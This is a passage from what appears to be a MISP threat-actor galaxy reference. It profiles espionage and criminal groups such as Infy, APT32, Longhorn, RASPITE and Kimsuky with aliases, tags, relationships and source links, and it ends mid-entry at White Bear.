Gamaredon Group has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Gamaredon Group - G0047"` with `estimative-language:likelihood-probability="likely"`
Hammer Panda

Hammer Panda is a group of suspected Chinese origin targeting organisations in Russia.

The tag is: *misp-galaxy:threat-actor="Hammer Panda"

Hammer Panda is also known as:

- Zhenbao
- TEMP.Zhenbao

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Infy

Infy is a group of suspected Iranian origin. Since early 2013, we have observed activity from a unique threat actor group, which we began to investigate based on increased activities against human rights activists in the beginning of 2015. In line with other research on the campaign, released prior to publication of this document, we have adopted the name “Infy”, which is based on labels used in the infrastructure and its two families of malware agents. Thanks to information we have been able to collect during the course of our research, such as characteristics of the group’s malware and development cycle, our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state. Amongst a backdrop of other incidents, Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014, growing in use up to the February 2016 parliamentary election in Iran. After the conclusion of the parliamentary election, the rate of attempted intrusions and new compromises through the Infy agent slowed, but did not end. The trends witnessed in reports from recipients are reinforced through telemetry provided by design failures in more recent versions of the Infy malware.

The tag is: *misp-galaxy:threat-actor="Infy"

Infy is also known as:

- Operation Mermaid
- Prince of Persia
Sima

Sima is a group of suspected Iranian origin targeting Iranians in diaspora. In February 2016, Iran-focused individuals received messages purporting to be from Human RightsWatch’s (HRW) Emergencies Director, requesting that they read an article about Iran pressing Afghan refugees to fight in Syria. While referencing a real report published by HRW, the links provided for the Director’s biography and article directed the recipient to malware hosted elsewhere. These spear-phishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting. Although the messages still had minor grammatical and stylistic errors that would be obvious to a native speaker, the actors demonstrated stronger English-language proficiency than past intrusion sets and a deeper investment in background research prior to the attempt. The actors appropriated a real identity that would be expected to professionally interact with the subject, then offered validation through links to their biography and social media, the former of which itself was malware as well. The bait documents contained a real article relevant to their interests and topic referenced, and the message attempted to address how it aligned with their professional research or field of employment. The referenced documents sent were malware binaries posing as legitimate files using the common right-to-left filenames tactic in order to conceal the actual file extension. All of these techniques, while common pretexting mechanisms, are a refinement compared to a tendency amongst other groups to simply continually send different forms of generic malware or phishing, in the hopes that one would eventually be successful.

The tag is: `misp-galaxy:threat-actor="Sima"`
Blue Termite

Blue Termite is a group of suspected Chinese origin active in Japan.

The tag is: `misp-galaxy:threat-actor="Blue Termite"`

Blue Termite is also known as:

- Cloudy Omega
- Emdivi

Table 5994. Table References

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</table>

Groundbait

Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk People’s Republics.

The tag is: `misp-galaxy:threat-actor="Groundbait"`

Table 5995. Table References

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<tr>
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</table>

Longhorn

Longhorn has been active since at least 2011. It has used a range of back door Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally. According to cfr, this threat actor compromises governments, international organizations, academic institutions, and financial, telecommunications, energy, aerospace, information technology, and natural
resource industries for espionage purposes. Some of the tools used by this threat actor were released by Wikileaks under the name "Vault 7."

The tag is: misp-galaxy:threat-actor="Longhorn"

Longhorn is also known as:

- Lamberts
- the Lamberts
- APT-C-39

Longhorn has relationships with:

- similar: misp-galaxy:threat-actor="Equation Group" with estimative-language:likelihood-probability="likely"

Table 5996. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/longhorn">https://www.cfr.org/interactive/cyber-operations/longhorn</a></td>
</tr>
</tbody>
</table>

Callisto

The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.

The tag is: misp-galaxy:threat-actor="Callisto"

Table 5997. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.f-secure.com/documents/996508/1030745/callisto-group">https://www.f-secure.com/documents/996508/1030745/callisto-group</a></td>
</tr>
</tbody>
</table>

APT32

Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted
operations that are aligned with Vietnamese state interests.

The tag is: misp-galaxy:threat-actor="APT32"

APT32 is also known as:

- OceanLotus Group
- Ocean Lotus
- OceanLotus
- Cobalt Kitty
- APT-C-00
- SeaLotus
- Sea Lotus
- APT-32
- APT 32
- Ocean Buffalo
- POND LOACH
- TIN WOODLAWN
- BISMUTH

APT32 has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="APT32 - G0050" with estimative-language:likelihood-probability="likely"

Table 5998. Table References

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<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></td>
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<td><a href="https://www.brighttalk.com/webcast/10703/261205">https://www.brighttalk.com/webcast/10703/261205</a></td>
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<tr>
<td><a href="https://github.com/eset/malware-research/tree/master/oceanlotus">https://github.com/eset/malware-research/tree/master/oceanlotus</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/ocean-lotus">https://www.cfr.org/interactive/cyber-operations/ocean-lotus</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/tin-woodlawn">https://www.secureworks.com/research/threat-profiles/tin-woodlawn</a></td>
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</tbody>
</table>
SilverTerrier

As these tools rise and fall in popularity (and more importantly, as detection rates by antivirus vendors improve), SilverTerrier actors have consistently adopted new malware families and shifted to the latest packing tools available.

The tag is: `misp-galaxy:threat-actor="SilverTerrier"`

WildNeutron

A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not-state sponsored, rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies who have publicly acknowledged attacks. Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target. This group operates at a much higher level than the average cybercrime gang. It is not interested in stealing credit card details or customer databases and is instead focused on high-level corporate information. Butterfly may be selling this information to the highest bidder or may be operating as hackers for hire. Stolen information could also be used for insider-trading purposes.

The tag is: `misp-galaxy:threat-actor="WildNeutron"`

WildNeutron is also known as:

- Butterfly
- Morpho
- Sphinx Moth
PLATINUM

PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.

The tag is: misp-galaxy:threat-actor="PLATINUM"

PLATINUM is also known as:

• TwoForOne

PLATINUM has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:microsoft-activity-group="PLATINUM" with estimative-language:likelihood-probability="likely"

Table 6001. Table References
ELECTRUM

Adversaries abusing ICS (based on Dragos Inc adversary list). Dragos, Inc. tracks the adversary group behind CRASHOVERRIDE as ELECTRUM and assesses with high confidence through confidential sources that ELECTRUM has direct ties to the Sandworm team. Our intelligence ICS WorldView customers have received a comprehensive report and this industry report will not get into sensitive technical details but instead focus on information needed for defense and impact awareness.

The tag is: misp-galaxy:threat-actor="ELECTRUM"

ELECTRUM is also known as:

- Sandworm

ELECTRUM has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="TeleBots" with estimative-language:likelihood-probability="likely"

Table 6002. Table References

Links

https://dragos.com/adversaries.html

RASPITE

Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE. Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time. RASPITE leverages strategic website
compromise to gain initial access to target networks. RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials. The group then deploys install scripts for a malicious service to beacon back to RASPITE-controlled infrastructure, allowing the adversary to remotely access the victim machine.

The tag is: misp-galaxy:threat-actor="RASPITE"

RASPITE is also known as:

- LeafMiner
- Raspite

Table 6003. Table References

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<tbody>
<tr>
<td><a href="https://dragos.com/blog/20180802Raspite.html">https://dragos.com/blog/20180802Raspite.html</a></td>
</tr>
<tr>
<td><a href="https://attack.mitre.org/groups/G0077/">https://attack.mitre.org/groups/G0077/</a></td>
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</table>

FIN8

FIN8 is a financially motivated group targeting the retail, hospitality and entertainment industries. The actor had previously conducted several tailored spearphishing campaigns using the downloader PUNCHBUGGY and POS malware PUNCHTRACK.

The tag is: misp-galaxy:threat-actor="FIN8"

FIN8 has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="FIN8 - G0061" with estimative-language:likelihood-probability="likely"

Table 6004. Table References

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<tr>
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<tbody>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html">https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html</a></td>
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<tr>
<td><a href="https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html">https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html</a></td>
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<tr>
<td><a href="https://attack.mitre.org/groups/G0061">https://attack.mitre.org/groups/G0061</a></td>
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</table>
**El Machete**

El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here. We've found that this group has continued to operate successfully, predominantly in Latin America, since 2014. All attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.

The tag is: *misp-galaxy:threat-actor*="El Machete"

El Machete is also known as:

- Machete
- machete-apt
- APT-C-43

---

**Cobalt**

A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.

The tag is: *misp-galaxy:threat-actor*="Cobalt"

Cobalt is also known as:

- Cobalt Group
- Cobalt Gang
- GOLD KINGSWOOD
- COBALT SPIDER

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**Table 6005. Table References**

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<tr>
<td><a href="https://securelist.com/el-machete/66108/">https://securelist.com/el-machete/66108/</a></td>
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<td><a href="https://www.cfr.org/interactive/cyber-operations/machete">https://www.cfr.org/interactive/cyber-operations/machete</a></td>
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**Table 6006. Table References**

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TA459

The tag is: *mispgalaxy:threat-actor*="TA459"

TA459 has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="TA459 - G0062" with estimative-language:likelihood-probability="likely"

*Table 6007. Table References*

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<tr>
<td><a href="https://attack.mitre.org/groups/G0062/">https://attack.mitre.org/groups/G0062/</a></td>
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</table>
Cyber Berkut

The tag is: misp-galaxy:threat-actor="Cyber Berkut"

Table 6008. Table References

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Tonto Team

The tag is: misp-galaxy:threat-actor="Tonto Team"

Tonto Team is also known as:

- CactusPete
- Karma Panda
- BRONZE HUNTLEY

Table 6009. Table References

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Danti

The tag is: misp-galaxy:threat-actor="Danti"

Table 6010. Table References

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APT5

We have observed one APT group, which we call APT5, particularly focused on telecommunications and technology companies. More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors. Several times, APT5 has targeted organizations and
personnel based in Southeast Asia. APT5 has been active since at least 2007. It appears to be a large threat group that consists of several subgroups, often with distinct tactics and infrastructure. APT5 has targeted or breached organizations across multiple industries, but its focus appears to be on telecommunications and technology companies, especially information about satellite communications. APT5 targeted the network of an electronics firm that sells products for both industrial and military applications. The group subsequently stole communications related to the firm’s business relationship with a national military, including inventories and memoranda about specific products they provided. In one case in late 2014, APT5 breached the network of an international telecommunications company. The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company’s relationships with other telecommunications companies.

The tag is: misp-galaxy:threat-actor="APT5"

APT5 is also known as:

- MANGANESE
- BRONZE FLEETWOOD

**Table 6011. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.fireeye.com/current-threats/apt-groups.html">https://www.fireeye.com/current-threats/apt-groups.html</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-fleetwood">https://www.secureworks.com/research/threat-profiles/bronze-fleetwood</a></td>
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</tbody>
</table>

**APT 22**

The tag is: misp-galaxy:threat-actor="APT 22"

APT 22 is also known as:

- APT22
- BRONZE OLIVE

**Table 6012. Table References**

<table>
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<tbody>
<tr>
<td><a href="http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild">http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-olive">https://www.secureworks.com/research/threat-profiles/bronze-olive</a></td>
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</table>

**Tick**

Tick is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group appears to have close ties to the Chinese National University of Defense and Technology,
which is possibly linked to the PLA. This threat actor targets organizations in the critical infrastructure, heavy industry, manufacturing, and international relations sectors for espionage purposes. The attacks appear to be centered on political, media, and engineering sectors. STALKER PANDA has been observed conducting targeted attacks against Japan, Taiwan, Hong Kong, and the United States.

The tag is: misp-galaxy:threat-actor="Tick"

Tick is also known as:

- Nian
- BRONZE BUTLER
- REDBALDKNIGHT
- STALKER PANDA

Tick has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="BRONZE BUTLER - G0060" with estimative-language:likelihood-probability="likely"

Table 6013. Table References

<table>
<thead>
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<tr>
<td><a href="https://www.secureworks.jp/resources/rp-bronze-butler">https://www.secureworks.jp/resources/rp-bronze-butler</a></td>
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<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/</a></td>
</tr>
<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/bronze-butler">https://www.cfr.org/interactive/cyber-operations/bronze-butler</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></td>
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<td><a href="https://attack.mitre.org/groups/G0060/">https://attack.mitre.org/groups/G0060/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-butler">https://www.secureworks.com/research/threat-profiles/bronze-butler</a></td>
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APT 26

The tag is: misp-galaxy:threat-actor="APT 26"

APT 26 is also known as:

- APT26
- Hippo Team
• JerseyMikes
• Turbine Panda
• BRONZE EXPRESS

APT 26 has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="Turla - G0010" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Turla Group" with estimative-language:likelihood-probability="likely"

Table 6014. Table References
Links
https://www.secureworks.com/research/threat-profiles/bronze-express

Sabre Panda

The tag is: misp-galaxy:threat-actor="Sabre Panda"

Table 6015. Table References
Links
http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

Big Panda

The tag is: misp-galaxy:threat-actor="Big Panda"

Table 6016. Table References
Links

Poisonous Panda

The tag is: misp-galaxy:threat-actor="Poisonous Panda"

Table 6017. Table References
Links

Ghost Jackal

The tag is: misp-galaxy:threat-actor="Ghost Jackal"
TEMP.Hermit

The tag is: `misp-galaxy:threat-actor="TEMP.Hermit"`

Mofang

The tag is: `misp-galaxy:threat-actor="Mofang"`

Mofang is also known as:

- Superman
- BRONZE WALKER

CopyKittens

The tag is: `misp-galaxy:threat-actor="CopyKittens"`

CopyKittens is also known as:

- Slayer Kitten

CopyKittens has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="CopyKittens - G0052"` with estimative-language:likelihood-probability="likely"
EvilPost

The tag is: `misp-galaxy:threat-actor="EvilPost"`

Table 6022. Table References

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<th>Links</th>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></td>
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SVCMONDR

The referenced link links this group to Temper Panda

The tag is: `misp-galaxy:threat-actor="SVCMONDR"`

Table 6023. Table References

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Test Panda

The tag is: `misp-galaxy:threat-actor="Test Panda"`

Table 6024. Table References

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<tr>
<td><a href="http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></td>
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</table>

Madi

Kaspersky Lab and Seculert worked together to sinkhole the Madi Command & Control (C&C) servers to monitor the campaign. Kaspersky Lab and Seculert identified more than 800 victims located in Iran, Israel and select countries across the globe connecting to the C&Cs over the past eight months. Statistics from the sinkhole revealed that the victims were primarily business people working on Iranian and Israeli critical infrastructure projects, Israeli financial institutions, Middle
Eastern engineering students, and various government agencies communicating in the Middle East. Common applications and websites that were spied on include accounts on Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+, and Facebook. Surveillance is also performed over integrated ERP/CRM systems, business contracts, and financial management systems.

The tag is: misp-galaxy:threat-actor="Madi"

Table 6025. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/madi">https://www.cfr.org/interactive/cyber-operations/madi</a></td>
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</table>

Electric Panda

The tag is: misp-galaxy:threat-actor="Electric Panda"

Table 6026. Table References

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<td><a href="http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></td>
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</table>

Maverick Panda

The tag is: misp-galaxy:threat-actor="Maverick Panda"

Maverick Panda is also known as:

- PLA Navy
- APT4
- APT 4
- BRONZE EDISON
- Sykipot

Table 6027. Table References

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<tr>
<td><a href="https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments">https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments</a></td>
</tr>
</tbody>
</table>
Kimsuky

This threat actor targets South Korean think tanks, industry, nuclear power operators, and the Ministry of Unification for espionage purposes.

The tag is: *misp-galaxy:threat-actor="Kimsuky"

Kimsuky is also known as:

- Velvet Chollima
- Black Banshee
- Thallium
- Operation Stolen Pencil

Table 6028. Table References

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<th>Links</th>
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<td><a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/</a></td>
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<td><a href="https://www.cfr.org/interactive/cyber-operations/kimsuky">https://www.cfr.org/interactive/cyber-operations/kimsuky</a></td>
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<td><a href="https://youtu.be/hAsKp43AZmM?t=1027">https://youtu.be/hAsKp43AZmM?t=1027</a></td>
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<td><a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/">https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/</a></td>
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<td><a href="https://attack.mitre.org/groups/G0086/">https://attack.mitre.org/groups/G0086/</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-301a">https://us-cert.cisa.gov/ncas/alerts/aa20-301a</a></td>
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</table>

Snake Wine

While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target
Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains, however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’. The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.

The tag is: `misp-galaxy:threat-actor="Snake Wine"`

**Table 6029. Table References**

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<tr>
<td><a href="https://www.jpcert.or.jp/magazine/acreport-ChChes.html">https://www.jpcert.or.jp/magazine/acreport-ChChes.html</a></td>
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</table>

**Careto**

This threat actor targets governments, diplomatic missions, private companies in the energy sector, and academics for espionage purposes. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name "Mask" comes from the Spanish slang word "Careto" ("Ugly Face" or "Mask") which the authors included in some of the malware modules. More than 380 unique victims in 31 countries have been observed to date. What makes “The Mask” special is the complexity of the toolset used by the attackers. This includes an extremely sophisticated malware, a rootkit, a bootkit, 32-and 64-bit Windows versions, Mac OS X and Linux versions and possibly versions for Android and iPad/iPhone (Apple iOS).

The tag is: `misp-galaxy:threat-actor="Careto"

Careto is also known as:

- The Mask
- Mask
- Ugly Face

**Table 6030. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://securelist.com/the-careomask-apt-frequently-asked-questions/58254/">https://securelist.com/the-careomask-apt-frequently-asked-questions/58254/</a></td>
</tr>
<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/careto">https://www.cfr.org/interactive/cyber-operations/careto</a></td>
</tr>
</tbody>
</table>
**Gibberish Panda**

The tag is: `misp-galaxy:threat-actor="Gibberish Panda"`

*Table 6031. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></td>
</tr>
</tbody>
</table>

**OnionDog**

This threat actor targets the South Korean government, transportation, and energy sectors.

The tag is: `misp-galaxy:threat-actor="OnionDog"`

*Table 6032. Table References*

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/onion-dog">https://www.cfr.org/interactive/cyber-operations/onion-dog</a></td>
</tr>
</tbody>
</table>

**Clever Kitten**

The tag is: `misp-galaxy:threat-actor="Clever Kitten"`

Clever Kitten is also known as:

- Group 41

Clever Kitten has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Cleaver - G0003"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Cutting Kitten"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Cleaver"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="OilRig"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="CHRYSENE"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Flying Kitten"` with `estimative-language:likelihood-probability="likely"`
• similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

Table 6033. Table References
<table>
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<tbody>
<tr>
<td><a href="http://www.crowdstrike.com/blog/whois-clever-kitten/">http://www.crowdstrike.com/blog/whois-clever-kitten/</a></td>
</tr>
</tbody>
</table>

**ANDROMEDA SPIDER**

The tag is: *misp-galaxy:threat-actor="ANDROMEDA SPIDER"*

Table 6034. Table References
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**Cyber Caliphate Army**

The tag is: *misp-galaxy:threat-actor="Cyber Caliphate Army"*

Cyber Caliphate Army is also known as:

• Islamic State Hacking Division
• CCA
• United Cyber Caliphate
• UUC
• CyberCaliphate

Table 6035. Table References
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division">https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division</a></td>
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<tr>
<td><a href="https://ent.siteintelgroup.com/index.php?option=com_customproperties&amp;view=search&amp;task=tag&amp;bind_to_category=content:37&amp;tagId=697">https://ent.siteintelgroup.com/index.php?option=com_customproperties&amp;view=search&amp;task=tag&amp;bind_to_category=content:37&amp;tagId=697</a></td>
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**MAGNETIC SPIDER**

The tag is: *misp-galaxy:threat-actor="MAGNETIC SPIDER"*

Table 6036. Table References
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Group 27

Arbor’s ASERT team is now reporting that, after looking deeper at that particular campaign, and by exposing a new trail in the group's activities, they managed to identify a new RAT that was undetectable at that time by most antivirus vendors. Named Trochilus, this new RAT was part of Group 27’s malware portfolio that included six other malware strains, all served together or in different combinations, based on the data that needed to be stolen from each victim. This collection of malware, dubbed the Seven Pointed Dagger by ASERT experts, included two different PlugX versions, two different Trochilus RAT versions, one version of the 3012 variant of the 9002 RAT, one EvilGrab RAT version, and one unknown piece of malware, which the team has not entirely decloaked just yet.

The tag is: misp-galaxy:threat-actor="Group 27"

Table 6037. Table References

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<tr>
<td><a href="https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn">https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/">https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/</a></td>
</tr>
</tbody>
</table>

SINGING SPIDER

The tag is: misp-galaxy:threat-actor="SINGING SPIDER"

Table 6038. Table References

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Cyber fighters of Izz Ad-Din Al Qassam

The tag is: misp-galaxy:threat-actor="Cyber fighters of Izz Ad-Din Al Qassam"

Cyber fighters of Izz Ad-Din Al Qassam is also known as:

- Fraternal Jackal

Table 6039. Table References

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<tr>
<td><a href="http://pastebin.com/u/QassamCyberFighters">http://pastebin.com/u/QassamCyberFighters</a></td>
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</table>
APT 6

The FBI issued a rare bulletin admitting that a group named Advanced Persistent Threat 6 (APT6) hacked into US government computer systems as far back as 2011 and for years stole sensitive data. The FBI alert was issued in February and went largely unnoticed. Nearly a month later, security experts are now shining a bright light on the alert and the mysterious group behind the attack. “This is a rare alert and a little late, but one that is welcomed by all security vendors as it offers a chance to mitigate their customers and also collaborate further in what appears to be an ongoing FBI investigation,” said Deepen Desai, director of security research at the security firm Zscaler in an email to Threatpost. Details regarding the actual attack and what government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,” Deepen said.

The tag is: `misp-galaxy:threat-actor="APT 6"`

APT 6 is also known as:

- 1.php Group
- APT6

Table 6040. Table References

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AridViper

The tag is: `misp-galaxy:threat-actor="AridViper"`

AridViper is also known as:

- Desert Falcon
- Arid Viper
- APT-C-23

Table 6041. Table References

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<tr>
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<tbody>
<tr>
<td><a href="https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/">https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/</a></td>
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</table>
DEXTOROUS SPIDER

The tag is: misp-galaxy:threat-actor="DEXTOROUS SPIDER"

Table 6042. Table References

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Unit 8200

The tag is: misp-galaxy:threat-actor="Unit 8200"

Unit 8200 is also known as:

- Duqu Group

Table 6043. Table References

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<tr>
<td><a href="https://archive.org/details/Stuxnet">https://archive.org/details/Stuxnet</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/duqu">https://www.cfr.org/interactive/cyber-operations/duqu</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/duqu-20">https://www.cfr.org/interactive/cyber-operations/duqu-20</a></td>
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</table>

White Bear

As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. Much of the contents of that report are reproduced here. WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report “Skipper Turla – the White Atlas framework” from mid-2016. Like previous Turla activity, WhiteBear leverages
